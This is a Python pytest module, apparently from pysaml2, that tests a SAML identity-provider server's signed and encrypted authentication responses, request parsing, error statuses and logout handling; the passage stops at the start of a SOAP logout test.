# -*- coding: utf-8 -*-
import base64
import copy
import os
from contextlib import closing
from six.moves.urllib.parse import parse_qs
import uuid
import re
from saml2.cert import OpenSSLWrapper
from saml2.sigver import make_temp, DecryptError, EncryptError, CertificateError
from saml2.assertion import Policy
from saml2.authn_context import INTERNETPROTOCOLPASSWORD
from saml2.saml import NameID, NAMEID_FORMAT_TRANSIENT
from saml2.samlp import response_from_string
from saml2.server import Server
from saml2 import samlp
from saml2 import saml
from saml2 import client
from saml2 import config
from saml2 import extension_elements_to_elements
from saml2 import s_utils
from saml2 import sigver
from saml2 import time_util
from saml2 import VERSION
from saml2.s_utils import OtherError
from saml2.s_utils import do_attribute_statement
from saml2.s_utils import factory
from saml2.s_utils import sid
from saml2.soap import make_soap_enveloped_saml_thingy
from saml2 import BINDING_HTTP_POST
from saml2 import BINDING_HTTP_REDIRECT
from saml2.time_util import instant
from pytest import raises
from pathutils import full_path
import saml2.xmldsig as ds
nid = NameID(name_qualifier="foo", format=NAMEID_FORMAT_TRANSIENT,
text="123456")
AUTHN = {
"class_ref": INTERNETPROTOCOLPASSWORD,
"authn_auth": "http://www.example.com/login"
}
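# Build a samlp.Response with a fresh id and issue instant; any keyword
# arguments are set as attributes on the response.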
def response_factory(**kwargs):
response = samlp.Response(id=sid(), version=VERSION, issue_instant=instant())
for key, val in kwargs.items():
setattr(response, key, val)
return response
def _eq(l1, l2):
return set(l1) == set(l2)
BASEDIR = os.path.abspath(os.path.dirname(__file__))
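# Flatten an assertion's attribute statements into a {friendly_name: [values]}
# dict, falling back to the attribute text when no friendly name is set.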
def get_ava(assertion):
ava = {}
for statement in assertion.attribute_statement:
for attr in statement.attribute:
value = []
for tmp_val in attr.attribute_value:
value.append(tmp_val.text)
key = attr.friendly_name
if key is None or len(key) == 0:
key = attr.text
ava[key] = value
return ava
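# Issue a throwaway certificate/key pair signed by the test root CA in root_cert/.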
def generate_cert():
sn = uuid.uuid4().urn
cert_info = {
"cn": "localhost",
"country_code": "se",
"state": "ac",
"city": "Umea",
"organization": "ITS",
"organization_unit": "DIRG"
}
osw = OpenSSLWrapper()
ca_cert_str = osw.read_str_from_file(
full_path("root_cert/localhost.ca.crt"))
ca_key_str = osw.read_str_from_file(
full_path("root_cert/localhost.ca.key"))
req_cert_str, req_key_str = osw.create_certificate(cert_info, request=True,
sn=sn, key_length=2048)
cert_str = osw.create_cert_signed_certificate(ca_cert_str, ca_key_str,
req_cert_str)
return cert_str, req_key_str
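# IdP Server tests: issuer/assertion construction, authn request parsing,
# signed and encrypted authn response variants, and logout request handling.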
class TestServer1():
def setup_class(self):
self.server = Server("idp_conf")
conf = config.SPConfig()
conf.load_file("server_conf")
self.client = client.Saml2Client(conf)
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id12")
self.ava = {"givenName": ["Derek"], "sn": ["Jeter"],
"mail": ["derek@nyy.mlb.com"], "title": "The man"}
def teardown_class(self):
self.server.close()
def verify_assertion(self, assertion):
assert assertion
assert assertion[0].attribute_statement
        ava = get_ava(assertion[0])
assert ava ==\
{'mail': ['derek@nyy.mlb.com'], 'givenName': ['Derek'],
'sn': ['Jeter'], 'title': ['The man']}
def verify_encrypted_assertion(self, assertion, decr_text):
self.verify_assertion(assertion)
assert assertion[0].signature is None
assert re.search(
r':EncryptedAssertion><encas[0-9]:Assertion ([^ >]* )*xmlns:encas[0-9]="urn:oasis:names:tc:SAML:2.0:assertion"',
decr_text,
)
def verify_advice_assertion(self, resp, decr_text):
assert resp.assertion[0].signature is None
assert resp.assertion[0].advice.encrypted_assertion[0].extension_elements
assertion = extension_elements_to_elements(resp.assertion[0].advice.encrypted_assertion[0].extension_elements,
[saml, samlp])
self.verify_encrypted_assertion(assertion, decr_text)
def test_issuer(self):
issuer = self.server._issuer()
assert isinstance(issuer, saml.Issuer)
assert _eq(issuer.keyswv(), ["text", "format"])
assert issuer.format == saml.NAMEID_FORMAT_ENTITY
assert issuer.text == self.server.config.entityid
def test_assertion(self):
assertion = s_utils.assertion_factory(
subject=factory(
saml.Subject, text="_aaa",
name_id=factory(saml.NameID,
format=saml.NAMEID_FORMAT_TRANSIENT)),
attribute_statement=do_attribute_statement(
{
("", "", "sn"): ("Jeter", ""),
("", "", "givenName"): ("Derek", ""),
}
),
issuer=self.server._issuer(),
)
assert _eq(assertion.keyswv(), ['attribute_statement', 'issuer', 'id',
'subject', 'issue_instant', 'version'])
assert assertion.version == "2.0"
assert assertion.issuer.text == "urn:mace:example.com:saml:roland:idp"
#
assert assertion.attribute_statement
attribute_statement = assertion.attribute_statement
assert len(attribute_statement.attribute) == 2
attr0 = attribute_statement.attribute[0]
attr1 = attribute_statement.attribute[1]
if attr0.attribute_value[0].text == "Derek":
assert attr0.friendly_name == "givenName"
assert attr1.friendly_name == "sn"
assert attr1.attribute_value[0].text == "Jeter"
else:
assert attr1.friendly_name == "givenName"
assert attr1.attribute_value[0].text == "Derek"
assert attr0.friendly_name == "sn"
assert attr0.attribute_value[0].text == "Jeter"
subject = assertion.subject
assert _eq(subject.keyswv(), ["text", "name_id"])
assert subject.text == "_aaa"
assert subject.name_id.format == saml.NAMEID_FORMAT_TRANSIENT
def test_response(self):
response = response_factory(
in_response_to="_012345",
destination="https:#www.example.com",
status=s_utils.success_status_factory(),
assertion=s_utils.assertion_factory(
subject=factory(saml.Subject, text="_aaa",
name_id=saml.NAMEID_FORMAT_TRANSIENT),
attribute_statement=do_attribute_statement(
{
("", "", "sn"): ("Jeter", ""),
("", "", "givenName"): ("Derek", ""),
}
),
issuer=self.server._issuer(),
),
issuer=self.server._issuer(),
)
print(response.keyswv())
assert _eq(response.keyswv(), ['destination', 'assertion', 'status',
'in_response_to', 'issue_instant',
'version', 'issuer', 'id'])
assert response.version == "2.0"
assert response.issuer.text == "urn:mace:example.com:saml:roland:idp"
assert response.destination == "https:#www.example.com"
assert response.in_response_to == "_012345"
#
status = response.status
print(status)
assert status.status_code.value == samlp.STATUS_SUCCESS
def test_parse_faulty_request(self):
req_id, authn_request = self.client.create_authn_request(
destination="http://www.example.com", id="id1")
        # should raise an error because of a faulty spentityid
binding = BINDING_HTTP_REDIRECT
htargs = self.client.apply_binding(
binding, "%s" % authn_request, "http://www.example.com", "abcd")
_dict = parse_qs(htargs["headers"][0][1].split('?')[1])
print(_dict)
with raises(OtherError):
self.server.parse_authn_request(_dict["SAMLRequest"][0], binding)
def test_parse_faulty_request_to_err_status(self):
req_id, authn_request = self.client.create_authn_request(
destination="http://www.example.com")
binding = BINDING_HTTP_REDIRECT
htargs = self.client.apply_binding(binding, "%s" % authn_request,
"http://www.example.com", "abcd")
_dict = parse_qs(htargs["headers"][0][1].split('?')[1])
print(_dict)
try:
self.server.parse_authn_request(_dict["SAMLRequest"][0], binding)
status = None
except OtherError as oe:
print(oe.args)
status = s_utils.error_status_factory(oe)
assert status
print(status)
assert _eq(status.keyswv(), ["status_code", "status_message"])
assert status.status_message.text == 'Not destined for me!'
status_code = status.status_code
assert _eq(status_code.keyswv(), ["status_code", "value"])
assert status_code.value == samlp.STATUS_RESPONDER
assert status_code.status_code.value == samlp.STATUS_UNKNOWN_PRINCIPAL
def test_parse_ok_request(self):
req_id, authn_request = self.client.create_authn_request(
message_id="id1",
destination="http://localhost:8088/sso",
nameid_format=saml.NAMEID_FORMAT_TRANSIENT,
)
print(authn_request)
binding = BINDING_HTTP_REDIRECT
htargs = self.client.apply_binding(binding, "%s" % authn_request,
"http://www.example.com", "abcd")
_dict = parse_qs(htargs["headers"][0][1].split('?')[1])
print(_dict)
req = self.server.parse_authn_request(_dict["SAMLRequest"][0], binding)
# returns a dictionary
print(req)
resp_args = self.server.response_args(req.message, [BINDING_HTTP_POST])
assert resp_args["destination"] == "http://lingon.catalogix.se:8087/"
assert resp_args["in_response_to"] == "id1"
name_id_policy = resp_args["name_id_policy"]
assert _eq(name_id_policy.keyswv(), ["format"])
assert name_id_policy.format == saml.NAMEID_FORMAT_TRANSIENT
assert resp_args[
"sp_entity_id"] == "urn:mace:example.com:saml:roland:sp"
def test_sso_response_with_identity(self):
name_id = self.server.ident.transient_nameid(
"https://example.com/sp", "id12")
resp = self.server.create_authn_response(
{
"eduPersonEntitlement": "Short stop",
"sn": "Jeter",
"givenName": "Derek",
"mail": "derek.jeter@nyy.mlb.com",
"title": "The man"
},
"id12", # in_response_to
"http://localhost:8087/", # destination
"https://example.com/sp", # sp_entity_id
name_id=name_id,
authn=AUTHN
)
print(resp.keyswv())
assert _eq(resp.keyswv(), ['status', 'destination', 'assertion',
'in_response_to', 'issue_instant',
'version', 'id', 'issuer'])
assert resp.destination == "http://localhost:8087/"
assert resp.in_response_to == "id12"
assert resp.status
assert resp.status.status_code.value == samlp.STATUS_SUCCESS
assert resp.assertion
assertion = resp.assertion
print(assertion)
assert assertion.authn_statement
assert assertion.conditions
assert assertion.attribute_statement
attribute_statement = assertion.attribute_statement
print(attribute_statement)
assert len(attribute_statement[0].attribute) == 4
# Pick out one attribute
attr = None
for attr in attribute_statement[0].attribute:
if attr.friendly_name == "givenName":
break
assert len(attr.attribute_value) == 1
assert attr.name == "urn:mace:dir:attribute-def:givenName"
assert attr.name_format == "urn:oasis:names:tc:SAML:2.0:attrname-format:basic"
value = attr.attribute_value[0]
assert value.text.strip() == "Derek"
assert value.get_type() == "xs:string"
assert assertion.subject
assert assertion.subject.name_id
assert assertion.subject.subject_confirmation
confirmation = assertion.subject.subject_confirmation[0]
print(confirmation.keyswv())
print(confirmation.subject_confirmation_data)
assert confirmation.subject_confirmation_data.in_response_to == "id12"
def test_sso_response_without_identity(self):
resp = self.server.create_authn_response(
{},
"id12", # in_response_to
"http://localhost:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
userid="USER1",
authn=AUTHN,
release_policy=Policy(),
best_effort=True
)
print(resp.keyswv())
assert _eq(resp.keyswv(), ['status', 'destination', 'in_response_to',
'issue_instant', 'version', 'id', 'issuer',
'assertion'])
assert resp.destination == "http://localhost:8087/"
assert resp.in_response_to == "id12"
assert resp.status
assert resp.status.status_code.value == samlp.STATUS_SUCCESS
assert resp.issuer.text == "urn:mace:example.com:saml:roland:idp"
assert not resp.assertion.attribute_statement
def test_sso_response_specific_instant(self):
_authn = AUTHN.copy()
_authn["authn_instant"] = 1234567890
resp = self.server.create_authn_response(
{},
"id12", # in_response_to
"http://localhost:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
userid="USER1",
authn=_authn,
best_effort=True
)
print(resp.keyswv())
assert _eq(resp.keyswv(), ['status', 'destination', 'in_response_to',
'issue_instant', 'version', 'id', 'issuer',
'assertion'])
authn_statement = resp.assertion.authn_statement[0]
assert authn_statement.authn_instant == '2009-02-13T23:31:30Z'
def test_sso_failure_response(self):
exc = s_utils.MissingValue("eduPersonAffiliation missing")
resp = self.server.create_error_response(
"id12", "http://localhost:8087/", exc)
print(resp.keyswv())
assert _eq(resp.keyswv(), ['status', 'destination', 'in_response_to',
'issue_instant', 'version', 'id', 'issuer'])
assert resp.destination == "http://localhost:8087/"
assert resp.in_response_to == "id12"
assert resp.status
print(resp.status)
assert resp.status.status_code.value == samlp.STATUS_RESPONDER
assert resp.status.status_code.status_code.value == \
samlp.STATUS_REQUEST_UNSUPPORTED
assert resp.status.status_message.text == \
"eduPersonAffiliation missing"
assert resp.issuer.text == "urn:mace:example.com:saml:roland:idp"
assert not resp.assertion
def test_authn_response_0(self):
conf = config.SPConfig()
conf.load_file("server_conf")
self.client = client.Saml2Client(conf)
ava = {"givenName": ["Derek"], "sn": ["Jeter"],
"mail": ["derek@nyy.mlb.com"], "title": "The man"}
npolicy = samlp.NameIDPolicy(format=saml.NAMEID_FORMAT_TRANSIENT,
allow_create="true")
resp_str = "%s" % self.server.create_authn_response(
ava, "id1", "http://local:8087/",
"urn:mace:example.com:saml:roland:sp", npolicy,
"foba0001@example.com", authn=AUTHN)
response = samlp.response_from_string(resp_str)
print(response.keyswv())
assert _eq(response.keyswv(), ['status', 'destination', 'assertion',
'in_response_to', 'issue_instant',
'version', 'issuer', 'id'])
print(response.assertion[0].keyswv())
assert len(response.assertion) == 1
assert _eq(response.assertion[0].keyswv(), ['attribute_statement',
'issue_instant', 'version',
'subject', 'conditions',
'id', 'issuer',
'authn_statement'])
assertion = response.assertion[0]
assert len(assertion.attribute_statement) == 1
astate = assertion.attribute_statement[0]
print(astate)
assert len(astate.attribute) == 4
def test_signed_response(self):
name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id12")
ava = {"givenName": ["Derek"], "sn": ["Jeter"],
"mail": ["derek@nyy.mlb.com"], "title": "The man"}
signed_resp = self.server.create_authn_response(
ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=name_id,
sign_assertion=True
)
print(signed_resp)
assert signed_resp
sresponse = response_from_string(signed_resp)
        # It's the assertions that are signed, not the response per se
assert len(sresponse.assertion) == 1
assertion = sresponse.assertion[0]
        # Since the response is created dynamically I don't know the signature
        # value. Just that there should be one
assert assertion.signature.signature_value.text != ""
def test_signed_response_1(self):
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=True,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id)
assert valid
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
node_id=sresponse.assertion[0].id)
assert valid
self.verify_assertion(sresponse.assertion)
def test_signed_response_2(self):
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=False,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id)
assert valid
        assert sresponse.assertion[0].signature is None
def test_signed_response_3(self):
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=True,
)
sresponse = response_from_string(signed_resp)
        assert sresponse.signature is None
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
node_id=sresponse.assertion[0].id)
assert valid
self.verify_assertion(sresponse.assertion)
def test_encrypted_signed_response_1(self):
cert_str, cert_key_str = generate_cert()
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=True,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(
signed_resp, self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id
)
assert valid
valid = self.server.sec.verify_signature(
signed_resp, self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
node_id=sresponse.assertion[0].id
)
assert valid
key_fd = make_temp(cert_key_str, decode=False)
decr_text = self.server.sec.decrypt(signed_resp, key_fd.name)
resp = samlp.response_from_string(decr_text)
assert resp.assertion[0].advice.encrypted_assertion[0].extension_elements
assertion = extension_elements_to_elements(
resp.assertion[0].advice.encrypted_assertion[0].extension_elements,
[saml, samlp])
self.verify_assertion(assertion)
        # PEFIM never signs assertions.
assert assertion[0].signature is None
#valid = self.server.sec.verify_signature(decr_text,
# self.server.config.cert_file,
# node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
# node_id=assertion[0].id)
assert valid
def test_encrypted_signed_response_2(self):
cert_str, cert_key_str = generate_cert()
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id)
assert valid
decr_text_old = copy.deepcopy("%s" % signed_resp)
with raises(DecryptError):
decr_text = self.server.sec.decrypt(
signed_resp,
self.client.config.encryption_keypairs[0]["key_file"],
)
decr_text = self.server.sec.decrypt(signed_resp, self.client.config.encryption_keypairs[1]["key_file"])
assert decr_text != decr_text_old
resp = samlp.response_from_string(decr_text)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
        assert resp.assertion[0].signature is None
self.verify_assertion(resp.assertion)
def test_encrypted_signed_response_3(self):
cert_str, cert_key_str = generate_cert()
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=False,
encrypt_cert_assertion=cert_str,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id)
assert valid
key_fd = make_temp(cert_key_str, decode=False)
decr_text = self.server.sec.decrypt(signed_resp, key_fd.name)
resp = samlp.response_from_string(decr_text)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
valid = self.server.sec.verify_signature(decr_text,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
node_id=resp.assertion[0].id)
assert valid
self.verify_assertion(resp.assertion)
assert 'xmlns:encas' not in decr_text
def test_encrypted_signed_response_4(self):
cert_str, cert_key_str = generate_cert()
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id)
assert valid
decr_text = self.server.sec.decrypt(signed_resp, self.client.config.encryption_keypairs[1]["key_file"])
resp = samlp.response_from_string(decr_text)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
valid = self.server.sec.verify_signature(decr_text,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
node_id=resp.assertion[0].id)
assert valid
key_fd = make_temp(cert_key_str, decode=False)
decr_text = self.server.sec.decrypt(decr_text, key_fd.name)
resp = samlp.response_from_string(decr_text)
assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
assertion = \
extension_elements_to_elements(assertion[0].advice.encrypted_assertion[0].extension_elements,[saml, samlp])
self.verify_assertion(assertion)
        # PEFIM never signs the assertion in the advice.
assert assertion[0].signature is None
#valid = self.server.sec.verify_signature(decr_text,
# self.server.config.cert_file,
# node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
# node_id=assertion[0].id)
assert valid
def test_encrypted_response_1(self):
cert_str_advice, cert_key_str_advice = generate_cert()
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str_advice,
)
_resp = "%s" % _resp
sresponse = response_from_string(_resp)
assert sresponse.signature is None
key_fd = make_temp(cert_key_str_advice, decode=False)
decr_text = self.server.sec.decrypt(_resp, key_fd.name)
resp = samlp.response_from_string(decr_text)
self.verify_advice_assertion(resp, decr_text)
def test_encrypted_response_2(self):
cert_str_advice, cert_key_str_advice = generate_cert()
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str_advice,
)
sresponse = response_from_string(_resp)
assert sresponse.signature is None
decr_text_1 = self.server.sec.decrypt(_resp, self.client.config.encryption_keypairs[1]["key_file"])
key_fd = make_temp(cert_key_str_advice, decode=False)
decr_text_2 = self.server.sec.decrypt(decr_text_1, key_fd.name)
resp = samlp.response_from_string(decr_text_2)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
self.verify_advice_assertion(resp, decr_text_2)
def test_encrypted_response_3(self):
cert_str_assertion, cert_key_str_assertion = generate_cert()
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=False,
encrypt_cert_assertion=cert_str_assertion
)
sresponse = response_from_string(_resp)
assert sresponse.signature is None
key_fd = make_temp(cert_key_str_assertion, decode=False)
decr_text = self.server.sec.decrypt(_resp, key_fd.name)
resp = samlp.response_from_string(decr_text)
assert resp.encrypted_assertion[0].extension_elements
assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
self.verify_encrypted_assertion(assertion, decr_text)
def test_encrypted_response_4(self):
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=False,
)
sresponse = response_from_string(_resp)
assert sresponse.signature is None
decr_text = self.server.sec.decrypt(_resp, self.client.config.encryption_keypairs[1]["key_file"])
resp = samlp.response_from_string(decr_text)
assert resp.encrypted_assertion[0].extension_elements
assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
self.verify_encrypted_assertion(assertion, decr_text)
def test_encrypted_response_5(self):
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True
)
_resp = "%s" % _resp
sresponse = response_from_string(_resp)
assert sresponse.signature is None
decr_text = self.server.sec.decrypt(_resp, self.client.config.encryption_keypairs[1]["key_file"])
resp = samlp.response_from_string(decr_text)
self.verify_advice_assertion(resp, decr_text)
def test_encrypted_response_6(self):
_server = Server("idp_conf_verify_cert")
cert_str_advice, cert_key_str_advice = generate_cert()
cert_str_assertion, cert_key_str_assertion = generate_cert()
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str_advice,
encrypt_cert_assertion=cert_str_assertion
)
sresponse = response_from_string(_resp)
assert sresponse.signature is None
key_fd1 = make_temp(cert_key_str_assertion, decode=False)
decr_text_1 = _server.sec.decrypt(_resp, key_fd1.name)
key_fd2 = make_temp(cert_key_str_advice, decode=False)
decr_text_2 = _server.sec.decrypt(decr_text_1, key_fd2.name)
resp = samlp.response_from_string(decr_text_2)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
self.verify_advice_assertion(resp, decr_text_2)
def test_encrypted_response_7(self):
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True
)
sresponse = response_from_string(_resp)
assert sresponse.signature is None
decr_text_1 = self.server.sec.decrypt(_resp, self.client.config.encryption_keypairs[1]["key_file"])
decr_text_2 = self.server.sec.decrypt(decr_text_1, self.client.config.encryption_keypairs[1]["key_file"])
resp = samlp.response_from_string(decr_text_2)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
self.verify_advice_assertion(resp, decr_text_2)
def test_encrypted_response_8(self):
with raises(EncryptError):
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice="whatever",
encrypt_cert_assertion="whatever"
)
with raises(EncryptError):
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice="whatever",
)
with raises(EncryptError):
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=False,
encrypt_cert_assertion="whatever"
)
_server = Server("idp_conf_verify_cert")
with raises(CertificateError):
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice="whatever",
encrypt_cert_assertion="whatever"
)
with raises(CertificateError):
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice="whatever",
)
with raises(CertificateError):
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=False,
encrypt_cert_assertion="whatever"
)
def test_encrypted_response_9(self):
_server = Server("idp_conf_sp_no_encrypt")
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
)
self.verify_assertion(_resp.assertion.advice.assertion)
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True
)
self.verify_assertion(_resp.assertion.advice.assertion)
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=False,
)
self.verify_assertion([_resp.assertion])
def test_slo_http_post(self):
soon = time_util.in_a_while(days=1)
sinfo = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": soon,
"user": {
"givenName": "Leo",
"sn": "Laport",
}
}
self.client.users.add_information_about_person(sinfo)
req_id, logout_request = self.client.create_logout_request(
destination="http://localhost:8088/slop", name_id=nid,
issuer_entity_id="urn:mace:example.com:saml:roland:idp",
reason="I'm tired of this")
intermed = base64.b64encode(str(logout_request).encode('utf-8'))
#saml_soap = make_soap_enveloped_saml_thingy(logout_request)
request = self.server.parse_logout_request(intermed, BINDING_HTTP_POST)
assert request
def test_slo_soap(self):
soon = time_util.in_a_while(days=1)
sinfo = {
"name_id": nid,
